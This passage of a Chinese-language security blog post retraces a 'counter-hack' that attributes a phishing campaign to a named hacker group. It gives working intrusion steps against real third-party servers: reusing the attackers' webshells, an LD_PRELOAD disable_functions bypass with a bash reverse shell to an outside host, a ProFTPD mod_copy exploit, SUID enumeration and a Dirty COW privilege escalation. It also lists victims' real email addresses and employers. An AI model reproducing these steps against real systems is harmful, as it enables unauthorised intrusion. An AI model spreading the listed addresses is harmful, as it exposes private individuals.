<h3 id="3-通过日志匹配邮箱并去重得到受害者邮箱地址"><a href="#3-通过日志匹配邮箱并去重得到受害者邮箱地址" class="headerlink" title="(3)通过日志匹配邮箱并去重得到受害者邮箱地址"></a><strong>(3)通过日志匹配邮箱并去重得到受害者邮箱地址</strong></h3><p><strong>整个溯源过程还不能忘记受害者群体的分析，这将是窥探攻击者主要目的的关键所在，原作者在这方面做得也非常好，根据匹配到的邮箱对受害者的身份进行了确认。</strong></p>
<pre><code class="hljs">root@kali /tmp egrep &#39;[0-Z_]&#123;1,&#125;@[0-Z]&#123;1,&#125;(\.[0-Z]&#123;1,&#125;)+&#39; * | awk -F &quot;\&quot;&quot; &#39;&#123;print $2&#125;&#39; |awk -F &quot;HTTP&quot; &#39;&#123;print $1&#125;&#39; |awk -F &quot;ml=&quot; &#39;&#123;print $2&#125;&#39; |sort |uniq
alexsin54@yahoo.com //攻击者邮箱
clavenda.payman@lbdi.net //利比亚发展投行CFO
dennis@rayfields.co.za //域名失效
georges.raad@nera.net //新加坡IT基础设施提供商员工
gthakkar@sscinc.com //美国SS&amp;C Technologies, Inc. 印度分公司
jasonchowan223@gmail.com //攻击者邮箱
******@******.com //同事
jiajie.lim@cimb.com //马来西亚联昌国际银行员工
kohchinbeng@bdo.com.sg //新加坡立信会计师事务所员工
mayfaithlee@hotmail.com //未知
philip@beekoo.hk //深圳市很有蜂格网络科技有限公司CEO
Point72.IR@sscinc.com //美国SS&amp;C Technologies, Inc.
shunweicapital@sscinc.com //美国SS&amp;C Technologies, Inc.疑似顺为资本
url@email.com //无效
</code></pre>
<h2 id="0X03-转战邮件发送地址进行漏洞挖掘"><a href="#0X03-转战邮件发送地址进行漏洞挖掘" class="headerlink" title="0X03 转战邮件发送地址进行漏洞挖掘"></a><strong>0X03 转战邮件发送地址进行漏洞挖掘</strong></h2><p>我们知道，攻击者为了隐藏自身，同样会使用肉鸡来进行邮件的发送，因此想要确定攻击者的身份，渗透邮件发送的肉鸡是绝对不能少的步骤</p>
<h3 id="1-猜测-shell-名进行渗透"><a href="#1-猜测-shell-名进行渗透" class="headerlink" title="(1)猜测 shell 名进行渗透"></a><strong>(1)猜测 shell 名进行渗透</strong></h3><p>和之前一样，还是一套信息收集</p>
<pre><code class="hljs">[+] HOST: mirohaviar.sk 85.248.229.150 斯洛伐克 
[+] OS: Debian 7 
[+] Web Server:Apache/2.2.22 PHP/5.2.6-1+lenny16 
[+] CMS: Joomla 1.5 
</code></pre>
<p>由于该站已经被删除，我无法再做进一步的检测，只能跟着作者的思路进行分析，原作者在发下现网站的能利用的漏洞被攻击者修复了以后，没有着急着去使用旁站进行攻击而是根据对攻击者行为的揣测，根据两个cms <strong>都是较低版本的 joomala 推断出攻击者应该是批量入侵，于是想到木马应该有着相同或者类似的文件名，于是便在这台服务器上也成功发现了攻击者留下的的后门(这在某种意义上讲也是一种社会工程学的思路)</strong></p>
<p>这时候其实只要得到 shell 的密码就能掌控这台服务器，原作者一开始使用的是解密的方式获取明文密码，但是后来发现密码竟是 简单的 root <strong>这也提醒我们可以先做一些简单的爆破尝试，不成功再尝试解密，或许能更快地得到权限</strong></p>
<h3 id="2-突破限制反弹shell"><a href="#2-突破限制反弹shell" class="headerlink" title="(2)突破限制反弹shell"></a><strong>(2)突破限制反弹shell</strong></h3><p>和之前一样，我们的目的是溯源追踪攻击者，试图获取攻击者的信息，也就是我们还是需要拿到网站的日志，但是我们的 webshell 目前没有这个权限，不仅受到了 disable_function 的限制还受到了 open_basedir 的约束，因此现在的情况就是<strong>无法跨目录访问也无法执行命令</strong></p>
<pre><code class="hljs">disable_functions escapeshellarg,escapeshellcmd,exec,passthru,proc_close,proc_get_status,proc_nice,proc_open,proc_terminate,shell_exec,system,popen,pcntl_exec

open_basedir /storage/www/mirohaviar.sk/:/storage/www-include/:/usr/share/php5/:/usr/share/file/:/usr/share/pear/:/tmp/
</code></pre>
<p>**因此我们需要将网站上的 shell 反弹到我们的 vps 上来突破我们的限制。**我简单的看了一下 disable_functions 发现并不是很严格，突破的方法其实有很多，原作者使用的是 LD_PRELOAD 的方式，这个方式可以说是一种比较复杂的方式了，正好用这个实例再学习巩固一下，关于 LD_PRELOAD 的具体一点的分析可以看<a target="_blank" rel="noopener" href="https://www.freebuf.com/articles/web/192052.html">这篇文章</a>我的<a target="_blank" rel="noopener" href="https://www.k0rz3n.com/2019/04/04/TCTF%202019%20%E7%BA%BF%E4%B8%8A%E8%B5%9B%20web%20%E9%A2%98%20writeup/">这篇文章</a>。</p>
<p><strong>可以通过命令查看 sendmail 函数执行过程中调用了那些库函数</strong></p>
<pre><code class="hljs">www-data@m7web1:/tmp$ readelf -Ws /usr/sbin/sendmail
Symbol table &#39;.dynsym&#39; contains 420 entries:
Num: Value Size Type Bind Vis Ndx Name
0: 0000000000000000 0 NOTYPE LOCAL DEFAULT UND
1: 0000000000000000 0 FUNC GLOBAL DEFAULT UND __printf_chk@GLIBC_2.3.4 (2)
2: 0000000000000000 0 FUNC GLOBAL DEFAULT UND getegid@GLIBC_2.2.5 (3)
3: 0000000000000000 0 FUNC GLOBAL DEFAULT UND dane_raw_tlsa@DANE_0_0 (4)
4: 0000000000000000 0 FUNC GLOBAL DEFAULT UND gnutls_ocsp_resp_print@GNUTLS_3_4 (5)
5: 0000000000000000 0 FUNC GLOBAL DEFAULT UND gnutls_x509_crt_get_serial@GNUTLS_3_4 (5)
6: 0000000000000000 0 FUNC GLOBAL DEFAULT UND __errno_location@GLIBC_2.2.5 (3)
7: 0000000000000000 0 FUNC GLOBAL DEFAULT UND gnutls_db_set_cache_expiration@GNUTLS_3_4 (5)
8: 0000000000000000 0 FUNC GLOBAL DEFAULT UND sendto@GLIBC_2.2.5 (3)
......
76: 0000000000000000 0 FUNC GLOBAL DEFAULT UND getuid@GLIBC_2.2.5 (3)
77: 0000000000000000 0 FUNC GLOBAL DEFAULT UND send@GLIBC_2.2.5 (3)
</code></pre>
<p>从中选取geteuid函数进行测试编写动态链接程序bypass.c</p>
<pre><code class="hljs">#include&lt;stdlib.h&gt;
#include &lt;stdio.h&gt;
#include&lt;string.h&gt;
void payload() &#123;
system(&quot;bash -i &gt;&amp; /dev/tcp/xxx.xxx.xxx.xxx/999 0&gt;&amp;1&quot;);
&#125;
int geteuid() &#123;
if(getenv(&quot;LD_PRELOAD&quot;) == NULL) &#123; return 0; &#125;
unsetenv(&quot;LD_PRELOAD&quot;);
payload();
&#125;
</code></pre>
<p>当这个共享库中的geteuid被调用时尝试加载payload()函数执行命令调用system执行一个反弹shell的操作xxx.xxx.xxx.xxx即是我的公网服务器IP</p>
<p>编译</p>
<pre><code class="hljs">gcc -c -fPIC bypass.c -o bypass
gcc -shared bypass.c -o bypass.so
</code></pre>
<p>上传</p>
<pre><code class="hljs">www-data@m7web1:/tmp$ cat b64.txt|base64 -d &gt;bypass.so
www-data@m7web1:/tmp$ file bypass.so
file bypass.so
bypass.so: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV)
</code></pre>
<p>执行</p>
<p><strong>bypass.php</strong></p>
<pre><code class="hljs">&lt;?php
putenv(&quot;LD_PRELOAD=/tmp/bypass.so&quot;);
mail(&quot;test@localhost&quot;,&quot;&quot;,&quot;&quot;,&quot;&quot;,&quot;&quot;);
?&gt;
</code></pre>
<p>浏览器访问<a target="_blank" rel="noopener" href="http://www.mirohaviar.sk/bypass.php%E9%A1%B5%E9%9D%A2%E5%90%8E%E6%88%90%E5%8A%9F%E6%89%A7%E8%A1%8C%E5%91%BD%E4%BB%A4%E5%BE%97%E5%88%B0%E4%BA%86%E4%B8%80%E4%B8%AAwww-data%E6%9D%83%E9%99%90%E7%9A%84%E5%8F%8D%E5%BC%B9shell">http://www.mirohaviar.sk/bypass.php页面后成功执行命令得到了一个www-data权限的反弹shell</a></p>
<h3 id="3-新的线索新的世界"><a href="#3-新的线索新的世界" class="headerlink" title="(3)新的线索新的世界"></a><strong>(3)新的线索新的世界</strong></h3><p>根据原作者描述，在拿到反弹的 shell 以后还是没有权限去访问 apache 的日志，但是作者却在 tmp 目录下发现了一个遗留的有趣的日志文件，里面记录着一个 ip 地址，根据这个 ip 地址，原作者通过GoogleHacking 的手法 inurl:bc.php?filesrc&#x3D; 发现了攻击者已经删除的一些后门文件快照，里面得到了攻击者所在的组织的信息(<strong>顺路安利一下我原来整理的一些 GoogleHacking 的技巧 <a target="_blank" rel="noopener" href="https://github.com/K0rz3n/GoogleHacking-Page">传送门</a></strong>)</p>
<p><img src="https://picture-1253331270.cos.ap-beijing.myqcloud.com/%E9%92%93%E9%B1%BC%E9%82%AE%E4%BB%B63.png" srcset="/img/loading.gif" lazyload alt="此处输入图片的描述"></p>
<p>我们也能看到底部的署名 $ Muslim Cyber Corp - Mujahidin Cyber Army - Family Attack Cyber</p>
<p><img src="https://picture-1253331270.cos.ap-beijing.myqcloud.com/%E9%92%93%E9%B1%BC%E9%82%AE%E4%BB%B64.png" srcset="/img/loading.gif" lazyload alt="此处输入图片的描述"></p>
<p>里面的成员大致有这些吧(这个图蛮漂亮的~小声bb)</p>
<p><img src="https://picture-1253331270.cos.ap-beijing.myqcloud.com/%E9%92%93%E9%B1%BC%E9%82%AE%E4%BB%B65.png" srcset="/img/loading.gif" lazyload alt="此处输入图片的描述"></p>
<p>原作者对攻击者曾经入侵过的网站依然采用的是直接使用已知 shell config.php 利用 root 密码登录以后获取 web 日志和目录并打包到 www 目录下直接下载的方式进行信息收集。</p>
<p><img src="https://picture-1253331270.cos.ap-beijing.myqcloud.com/%E9%92%93%E9%B1%BC%E9%82%AE%E4%BB%B67.png" srcset="/img/loading.gif" lazyload alt="此处输入图片的描述"></p>
<h2 id="0X04-傀儡机突破"><a href="#0X04-傀儡机突破" class="headerlink" title="0X04 傀儡机突破"></a><strong>0X04 傀儡机突破</strong></h2><h3 id="1-低版本PROFTPD-未授权文件复制getshell"><a href="#1-低版本PROFTPD-未授权文件复制getshell" class="headerlink" title="(1)低版本PROFTPD 未授权文件复制getshell"></a><strong>(1)低版本PROFTPD 未授权文件复制getshell</strong></h3><p>上面已经发现了攻击者常用的用来进行攻击的服务器 ip ，那我们自然不能放过这台服务器，开始新一轮的渗透。</p>
<pre><code class="hljs">[+] HOST: 187.85.134.4巴西 
[+] OS: Ubuntu 
[+] Web Server: Apache/2.2.22 / PHP/5.3.10-1ubuntu3.19 
[+] CMS: 未知
</code></pre>
<p>nmap 使用绕过防火墙的参数，这里其实对我来说要学习的是增加对 nmap 各种参数的灵活使用程度</p>
<pre><code class="hljs">nmap --script=firewalk --traceroute 187.85.134.4
</code></pre>
<p>然后原作者后面的漏洞利用也是让我大开眼界，在端口扫描以后发现 21 端口开放</p>
<pre><code class="hljs">Starting Nmap 7.60 ( https://nmap.org ) at 2019-02-17 07:49 UTC
Nmap scan report for 187.85.134.4
Host is up (0.14s latency).
Not shown: 996 filtered ports
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
53/tcp open  domain
80/tcp open  http
</code></pre>
<p>直接想到使用 nc 链接 21 端口判断 ftp 的版本，找到一个 proftpd 的低版本未授权复制漏洞</p>
<pre><code class="hljs">root@K0rz3n:~# nc 187.85.134.4 21
220 ProFTPD 1.3.4a Server (Debian) [::ffff:187.85.134.4]
</code></pre>
<p>我肯定是没有这种思路的，我充其量的想法就是直接利用原始的大马反弹一个 shell 回来，<strong>不过这里也给我一些启示，渗透过程中要多多关注服务器使用的各种服务版本，任何低版本服务的漏洞都是整个服务器的突破口。</strong></p>
<blockquote>
<p>端口扫描发现目标 FTP Server为ProFTPd 1.3.4a这个版本和1.3.5存在未授权文件复制漏洞我们可以通过这个漏洞往Web目录写入一个WebShell。</p>
<p>ProFTPd 1.3.5 Remote Command ExecutionCVE-2015-3306<br>ProFTPD中使用的mod_copy模块存在未授权访问风险导致ProFTPD自带的命令 SITE CPFR 和 SITE CPTO可在未登录ftp的情况被外部黑客所利用对系统文件进行任意复制。</p>
</blockquote>
<p>**还有一点值得学习的就是原作者在寻找 exp 的时候使用了 kail 自带的 searchspolit 这个工具，**我原来也没怎么注意到国，查了一下发现是和 exp-db 结合的离线 exp 库，很好用，这有一篇文章可以参考一下 <a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/2860">传送门</a>，<strong>还有就是强烈建议大家在自己的 vps 上安装好 kali 或者是一些常用工具如：msf ，这将是我们能正常渗透的保障。</strong></p>
<h3 id="2-拿到服务器全面围剿"><a href="#2-拿到服务器全面围剿" class="headerlink" title="(2)拿到服务器全面围剿"></a><strong>(2)拿到服务器全面围剿</strong></h3><p>在拿到了攻击者常用的傀儡服务器以后，原作者发现了大量的钓鱼脚本、挖矿后门和 DDOS 脚本，这些对于我们分析攻击者的行为是非常重要的，这也可以看出攻击者在这方面是比较专业的和系统的。</p>
<p><strong>僵尸网络程序</strong></p>
<p><img src="https://picture-1253331270.cos.ap-beijing.myqcloud.com/%E9%92%93%E9%B1%BC%E9%82%AE%E4%BB%B68.png" srcset="/img/loading.gif" lazyload alt="此处输入图片的描述"></p>
<p><strong>DDOS 脚本</strong></p>
<p><img src="https://picture-1253331270.cos.ap-beijing.myqcloud.com/%E9%92%93%E9%B1%BC%E9%82%AE%E4%BB%B69.png" srcset="/img/loading.gif" lazyload alt="此处输入图片的描述"></p>
<p><strong>钓鱼邮件模板</strong></p>
<p><img src="https://picture-1253331270.cos.ap-beijing.myqcloud.com/%E9%92%93%E9%B1%BC%E9%82%AE%E4%BB%B610.png" srcset="/img/loading.gif" lazyload alt="此处输入图片的描述"></p>
<p><strong>万条邮箱信息</strong></p>
<p><img src="https://picture-1253331270.cos.ap-beijing.myqcloud.com/%E9%92%93%E9%B1%BC%E9%82%AE%E4%BB%B611.png" srcset="/img/loading.gif" lazyload alt="此处输入图片的描述"></p>
<h3 id="3-杀器提权一击致命"><a href="#3-杀器提权一击致命" class="headerlink" title="(3)杀器提权一击致命"></a><strong>(3)杀器提权一击致命</strong></h3><h4 id="1-为什么要提权"><a href="#1-为什么要提权" class="headerlink" title="1.为什么要提权"></a><strong>1.为什么要提权</strong></h4><p>为什么要提权，因为我们的目的还是想获取 apache 的日志，目前我们的 shell 是没有访问 apache 日志的权限的</p>
<p><img src="https://picture-1253331270.cos.ap-beijing.myqcloud.com/%E9%92%93%E9%B1%BC%E9%82%AE%E4%BB%B612.png" srcset="/img/loading.gif" lazyload alt="此处输入图片的描述"></p>
<p>就算是我们可以打包整个网站，我们最终获取的还是我们有权限打包的目录，其他的一概不能打包成功 </p>
<p>那么，我们在默认权限下能打包到哪些文件呢？可能有些同学还不是很清楚，对 shell 权限的还是有误解，我其实之前也写过一个关于 shell 权限的探究问题，有兴趣得同学可以在我博客往前翻翻，这里我就再简单说一下：</p>
<p><strong>每个文件都有针对三个所属组的权限分配，我么的 php 的 shell 是 www-data 权限，这个用户是属于 其他用户组的，也就是说在使用 ls -la 插卡权限的时候看最后的三个字母的，我们在最后的三个字母里面主要有读权限(也就是最少有一个 r ),我们的 shell 才能将这个文件下载，如图所示：</strong></p>
<p><img src="https://picture-1253331270.cos.ap-beijing.myqcloud.com/%E9%92%93%E9%B1%BC%E9%82%AE%E4%BB%B613.png" srcset="/img/loading.gif" lazyload alt="此处输入图片的描述"></p>
<p>在上面这幅图中，我们能下载的文件只有</p>
<pre><code class="hljs">alternatives.log
alternatives.log.1
alternatives.log.2.gz
apt                  -------------&gt;这是个目录，还要看目录里面的文件的权限
bot.log
</code></pre>
<h4 id="2-常见的-linux-提权方式"><a href="#2-常见的-linux-提权方式" class="headerlink" title="2.常见的 linux 提权方式"></a><strong>2.常见的 linux 提权方式</strong></h4><p><strong>Linux 提权有很多方式，常见的检测步骤如下</strong></p>
<pre><code class="hljs">1.检测操作系统的发行版本

2.查看内核版本

3.检测当前用户权限

4.列举Suid文件

5.查看已经安装的包，程序，运行的服务，过期版本的有可能有漏洞
</code></pre>
<p>这里面其实涉及到几种 Linux 的提权思路，</p>
<h5 id="1-内核-exp-提权"><a href="#1-内核-exp-提权" class="headerlink" title="(1)内核 exp 提权"></a><strong>(1)内核 exp 提权</strong></h5><p>最简单直接的就是使用内核 exp 进行提权的方式，但是使用这种方式提权会有使目标系统崩溃的风险，</p>
<h5 id="2-suid提权"><a href="#2-suid提权" class="headerlink" title="(2)suid提权"></a><strong>(2)suid提权</strong></h5><p><strong>SUID是Linux的一种权限机制，具有这种权限的文件会在其执行时，使调用者暂时获得该文件拥有者的权限。如果拥有SUID权限，那么就可以利用系统中的二进制文件和工具来进行root提权</strong>。我们要在系统中找到有suid位的程序，寻找方法如下：</p>
<pre><code class="hljs">find / -user root -perm -4000 -print 2&gt;/dev/null
find / -perm -u=s -type f 2&gt;/dev/null
find / -user root -perm -4000 -exec ls -ldb &#123;&#125; \; 
</code></pre>
<p>已知的可以使用 suid 进行特权提升的程序有：</p>
<pre><code class="hljs">Ø Nmap

Ø Vim

Ø find

Ø Bash

Ø More

Ø Less

Ø Nano

Ø cp
</code></pre>
<p><img src="https://picture-1253331270.cos.ap-beijing.myqcloud.com/%E9%92%93%E9%B1%BC%E9%82%AE%E4%BB%B616.png" srcset="/img/loading.gif" lazyload alt="此处输入图片的描述"></p>
<p>上面的所有二进制文件都可以在root权限下运行，因为他们的owner是root，并且他们的权限中含有s。s权限使一般使用者临时具有该文件所属主&#x2F;组的执行权限。</p>
<p>但是由于这里的程序似乎没有能利用的，于是这一条路在这里就走不通了，如果想看具体的演示案例，可以看<a target="_blank" rel="noopener" href="https://pentestlab.blog/2017/09/25/suid-executables/">这篇文章</a></p>
<h5 id="3-劫持环境变量提权"><a href="#3-劫持环境变量提权" class="headerlink" title="(3)劫持环境变量提权"></a><strong>(3)劫持环境变量提权</strong></h5><p>这个思路大概就是，如果存在一个程序运行过程中会调用一个系统程序，那么我们可以把程序当前目录加入到系统的环境变量中，并且在程序目录中伪造那个系统程序为执行 &#x2F;bin&#x2F;sh，那么当再次运行那个程序的时候就能调用我们自己 构造的假的系统程序从而提权，具体的操作可以看 <a target="_blank" rel="noopener" href="https://www.webshell.cc/5211.html">这篇文章</a> </p>
<p>分析了一圈，发现这台服务器还是要用第一种简单直接的方式提权，本机的操作系统发行版本以及内核信息如下(<strong>i386 说明是32位系统，如果是 x86_64 是64位系统</strong>)</p>
<p><img src="https://picture-1253331270.cos.ap-beijing.myqcloud.com/%E9%92%93%E9%B1%BC%E9%82%AE%E4%BB%B614.png" srcset="/img/loading.gif" lazyload alt="此处输入图片的描述"></p>
<blockquote>
<p>当然查看系统发行版本除了使用上图的方式以外还可以使用 lsb_release -a</p>
<p><img src="https://picture-1253331270.cos.ap-beijing.myqcloud.com/%E9%92%93%E9%B1%BC%E9%82%AE%E4%BB%B615.png" srcset="/img/loading.gif" lazyload alt="此处输入图片的描述"></p>
</blockquote>
<p><strong>原作者这里使用的是脏牛(CVE-2016-5195脏牛 理论上通杀 2.6.22 &lt; 3.9 (x86&#x2F;x64)的内核版本。)进行提权，并且原文中提到了一点，作者是先在本地环境中进行了测试的，因为我们之前也说过，内核提权稍有不慎就会引起服务器崩溃，所以说原作者这样做是很值得我们学习的</strong></p>
<p>使用dirtycow-mem.c提权时需要注意i386架构下编译前需要将源代码中libc路径修改为目标系统libc路径否则执行时找不到文件，exp 来源于 <a target="_blank" rel="noopener" href="https://gist.github.com/scumjr/17d91f20f73157c722ba2aea702985d2">github</a> 。</p>
<pre><code class="hljs">#define SHELLCODE &quot;\x31\xc0\xc3&quot;
#define SPACE_SIZE 256
#define LIBC_PATH &quot;/lib/x86_64-linux-gnu/libc.so.6&quot; ## 改为　/lib/i386-linux-gnu/libc.so.6
#define LOOP 0x1000000
#ifndef PAGE_SIZE
#define PAGE_SIZE 4096
...
</code></pre>
<p>因为我发现目标系统没有安装 gcc ，所以我必须启动一个 i386 的ubuntu docker 进行编译(如果在 64为机器上编译，exp 将无法在 i386 目标机器上运行)，然后将编译好的 exp 进行上传</p>
<p><strong>编译</strong></p>
<pre><code class="hljs">root@a6fb4b362251:/tmp# gcc -Wall -o hello dirtycow-mem.c -ldl -lpthread
</code></pre>
<p><strong>运行</strong></p>
<p><img src="https://picture-1253331270.cos.ap-beijing.myqcloud.com/%E9%92%93%E9%B1%BC%E9%82%AE%E4%BB%B617.png" srcset="/img/loading.gif" lazyload alt="此处输入图片的描述"></p>
<p>现在就能顺理成章地访问我们亲爱的 apache2 文件夹了</p>
<p><img src="https://picture-1253331270.cos.ap-beijing.myqcloud.com/%E9%92%93%E9%B1%BC%E9%82%AE%E4%BB%B618.png" srcset="/img/loading.gif" lazyload alt="此处输入图片的描述"></p>
<p>这样我们就能分析到 apache 日志了</p>
<h3 id="4-日志分析揭开面纱"><a href="#4-日志分析揭开面纱" class="headerlink" title="(4)日志分析揭开面纱"></a><strong>(4)日志分析揭开面纱</strong></h3><p>分析IP访问情况</p>
<pre><code class="hljs">root@kali /tmp/ grep &quot;/cacat/&quot; * |grep &quot;php&quot; | awk -F &quot;:&quot; &#39;&#123;print $2&#125;&#39; |awk &#39;&#123;a[$1]+=1;&#125; END &#123;for(i in a)&#123;print a[i]&quot; &quot;i;&#125;&#125;&#39; |sort -t &quot; &quot; -k 1 -n -r &gt;ip.txt
95 185.56.80.138
77 197.211.60.52
70 67.71.3.8
59 207.35.210.35
41 99.226.207.46
41 193.215.40.238
39 197.211.59.163
38 82.61.95.132
38 66.249.73.95
37 76.26.34.181
37 197.234.221.77
31 105.112.27.60
29 105.112.23.41
20 109.166.138.68
16 66.249.79.61
16 197.211.61.18
14 212.100.77.191
12 197.234.221.210
8 66.249.79.35
8 66.249.73.64
7 154.118.69.165
5 66.249.73.67
......

root@kali /tmp for line in $(&lt;ip.txt); do curl https://ip.cn/\?ip\=$line ; done
IP: 185.56.80.138 来自: 荷兰
IP: 197.211.60.52 来自: 尼日利亚
IP: 67.71.3.8 来自: 加拿大
IP: 207.35.210.35 来自: 加拿大
IP: 99.226.207.46 来自: 加拿大
IP: 193.215.40.238 来自: 挪威
IP: 197.211.59.163 来自: 尼日利亚
IP: 82.61.95.132 来自: 意大利
IP: 66.249.73.95 来自: Google 骨干网
IP: 76.26.34.181 来自: 美国
IP: 197.234.221.77 来自: 贝宁
IP: 105.112.27.60 来自: 尼日利亚
IP: 105.112.23.41 来自: 尼日利亚
IP: 109.166.138.68 来自: 罗马尼亚
IP: 66.249.79.61 来自: Google 骨干网
IP: 197.211.61.18 来自: 尼日利亚
IP: 212.100.77.191 来自: 尼日利亚
IP: 197.234.221.210 来自: 贝宁
IP: 66.249.79.35 来自: Google 骨干网
IP: 66.249.73.64 来自: Google 骨干网
IP: 154.118.69.165 来自: 尼日利亚
IP: 66.249.73.67 来自: Google 骨干网
......
</code></pre>
<p>根据路径名判断疑似受害者访问了钓鱼页面。</p>
<pre><code class="hljs">root@kali /tmp/ grep &quot;/cacat&quot; *| grep &quot;php&quot; |grep &quot;POST&quot; |awk -F &quot;:&quot; &#39;&#123;print $2 $6&#125;&#39; |sort |uniq
109.166.138.68 - - [31/Jan/2018//187.85.134.4/cacat/portal/portal/userlogin.php&quot; &quot;Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36&quot;
109.166.138.68 - - [31/Jan/2018//187.85.134.4/cacat/portal/portal/userlogin.php?sfm_sid=120&quot; &quot;Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36&quot;
185.56.80.138 - - [31/Jan/2018//187.85.134.4/cacat/portal/portal/userlogin.php?sfm_sid=8425&quot; &quot;Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36&quot;
196.52.34.20 - - [12/Oct/201835.0) Gecko/20100101 Firefox/35.0&quot;
207.35.210.35 - - [21/Aug/2018//187.85.134.4/cacat/win2018/winbnk/EBlogin.html?sitecode=GR&amp;lang=el-GR&quot; &quot;Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36&quot;
197.211.60.52 - - [07/Sep/2018:16:02:40 -0300] &quot;GET /cacat/nnnnn.zip HTTP/1.1&quot; 200 4489167 &quot;http://187.85.134.4/cacat/&quot; &quot;Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36&quot;
</code></pre>
<p>查看web目录下txt文件访问情况总共有一万多IP。访问地址包含受害者主机IP、各种搜索引擎爬虫IP、各路黑客的IP等等。</p>
<pre><code class="hljs">grep &quot;/cacat/&quot; * |grep &quot;txt&quot; | awk -F &quot;:&quot; &#39;&#123;print $2&#125;&#39; |awk &#39;&#123;a[$1]+=1;&#125; END &#123;for(i in a)&#123;print a[i]&quot; &quot;i;&#125;&#125;&#39; |sort -t &quot; &quot; -k 1 -n -r &gt;ip.txt

root@kali ~/Desktop wc -l ip.txt
10101 ip.txt
</code></pre>
<h2 id="0X05-热力图分析"><a href="#0X05-热力图分析" class="headerlink" title="0X05 热力图分析"></a><strong>0X05 热力图分析</strong></h2><p>将获得的IP转换成经纬度坐标再通过百度地图API生成热力图</p>
<pre><code class="hljs">将IP转换成经纬度坐标脚本ip2xy.py 
生成经纬度坐标文件point.js 
全球IP库GeoLiteCity.dat
</code></pre>
<p>这个我也是没想到的一步，通过热力图能将我们之前收集到的 ip 地址在全球的分布很直观的表现出来，可以说原作者在这方面的经验还是十分的丰富</p>
<h2 id="0X06-信息汇总"><a href="#0X06-信息汇总" class="headerlink" title="0X06 信息汇总"></a><strong>0X06 信息汇总</strong></h2><p>根据所得信息汇总对这个黑客组织信息进行简单分析仅供参考。</p>
<h3 id="1-组织信息"><a href="#1-组织信息" class="headerlink" title="(1)组织信息"></a><strong>(1)组织信息</strong></h3><p>名称</p>
<pre><code class="hljs">Muslim Cyber Corp – Mujahidin Cyber Army – Family Attack Cyber
</code></pre>
<p>地区</p>
<pre><code class="hljs">巴勒斯坦
</code></pre>
<p>成员ID</p>
<pre><code class="hljs">Hawk_B404 、 MR.S1NS_Y 、 koneksi eror 、 GU3LT03M 、 SinonX 、 
./B4Z1R007 、 ./Bl4ckJ4ck 、 anon99husein 、 4GottenName 、Gantai 、 4nzeL4 
、 AKEMI403
</code></pre>
<p>历史邮箱</p>
<pre><code class="hljs">alexsin54@yahoo.com 
jasonchowan223@gmail.com 
macacperus@yopmail.com 
bidibidibidi@yopmail.com 
bidi.pici11@hotmail.com 
bidi.cuc@mail.com 
flrnvasilica@gmail.com
</code></pre>
<p>组织主页</p>
<pre><code class="hljs">http://mujahidincyberarmy.blogspot.com/ 
https://www.facebook.com/FamilyAttackCyberOfficial/
</code></pre>
<h3 id="2-攻击手段"><a href="#2-攻击手段" class="headerlink" title="(2)攻击手段"></a><strong>(2)攻击手段</strong></h3><pre><code class="hljs">入侵使用Wordpress、Joomla! CMS的网站、放置钓鱼程序批量传播钓鱼邮件。
</code></pre>
<p>攻击目标</p>
<pre><code class="hljs">早期政治目的居多主要攻击美国政府机构网站和雇员。近期多为商业目的主要针对欧洲银行客户以及亚洲金融机构雇员进行邮件钓鱼。
</code></pre>
<p>控制主机</p>
<pre><code class="hljs">187.85.134.4
</code></pre>
<p>常用后门</p>
<pre><code class="hljs">略
</code></pre>
<h3 id="3-攻击历史"><a href="#3-攻击历史" class="headerlink" title="(3)攻击历史"></a><strong>(3)攻击历史</strong></h3><p>美国联邦调查局、美国国土安全部、美国司法部</p>
<pre><code class="hljs">巴勒斯坦黑客已经发布了大约2万名联邦调查局FBI和9,000名国土安全部DHS官员的个人信息 
http://mujahidincyberarmy.blogspot.com/2016/12/inilah-data-informasi-pribadi-20-ribu.html

通过钓鱼邮件获得美国司法部权限 
http://mujahidincyberarmy.blogspot.com/2016/02/hacker-pro-palestina-terbitkan.html
</code></pre>
<h3 id="4-代理IP"><a href="#4-代理IP" class="headerlink" title="(4)代理IP"></a><strong>(4)代理IP</strong></h3><pre><code class="hljs">174.85.145.99 (美国) - - [27/Nov/2018:23:35:31 +0300] &quot;POST /shells/bacu.php HTTP/1.1&quot; 200 4731 &quot;http://www.rosturplast.com/shells/bacu.php&quot; &quot;Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36&quot;
50.73.252.169 (美国) - - [29/Nov/2018//www.rosturplast.com/shells/config.php&quot; &quot;Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36&quot;
213.233.104.120 (罗马尼亚) - - [27/Nov/2018:22:10:03 +0300] &quot;GET /shells/config.php HTTP/1.1&quot; 200 124 &quot;-&quot; &quot;Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0&quot;
207.228.149.69 (百慕大 ) - - [28/Nov/2018:23:12:54 +0300] &quot;POST /shells/config.php HTTP/1.1&quot; 200 3729 &quot;http://www.rosturplast.com/shells/config.php&quot; &quot;Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36&quot;
195.211.23.207 (俄罗斯) - - [27/Nov/2018:22:36:50 +0300] &quot;GET /shells/config.php HTTP/1.1&quot; 200 124 &quot;-&quot; &quot;Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36&quot;
